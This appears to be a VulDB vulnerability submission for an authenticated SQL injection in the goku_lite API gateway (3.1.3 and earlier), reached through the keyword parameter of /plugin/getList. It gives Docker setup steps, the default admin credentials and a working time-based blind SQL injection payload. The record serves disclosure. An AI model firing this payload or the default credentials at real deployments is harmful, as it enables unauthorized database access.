| Titolo | goku_lite <= 3.1.3 Authenticated SQL injection via /plugin/getList route and keyword parameter |
|---|
| Descrizione | # Get start
repo: ** https://github.com/eolinker/goku_lite **
- Execute docker command
- Start goku
```bash
docker run
docker run -dt -p 7000:7000
-v /app/goku-ce/work:/app/goku-ce/console/work
-e GOKU_ADMIN_PASSWORD=123456
--network=goku-ce
--ip 172.18.12.2
--name goku-ce-console
eolinker/goku-api-gateway-ce-console
```
user/pass:
admin/123456
# vulnerability
goku_lite <= 3.1.3 Authenticated SQL injection via /plugin/getList route and keyword parameter
use admin/123456 to login
POC:
Request URL: http://testlink:7000/plugin/getList
Request Method: POST
PostData: keyword=' AND 8247=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- PSdW
Use sqlmap :


Please show QSec-Team in the detail of cve page.
Thanks,
QSec-Team |
|---|
| Utente | qsec (UID 33968) |
|---|
| Sottomissione | 11/11/2022 12:25 (4 anni fa) |
|---|
| Moderazione | 11/11/2022 13:14 (48 minutes later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 213454 [eolinker goku_lite /plugin/getList route/keyword iniezione SQL] |
|---|
| Punti | 17 |
|---|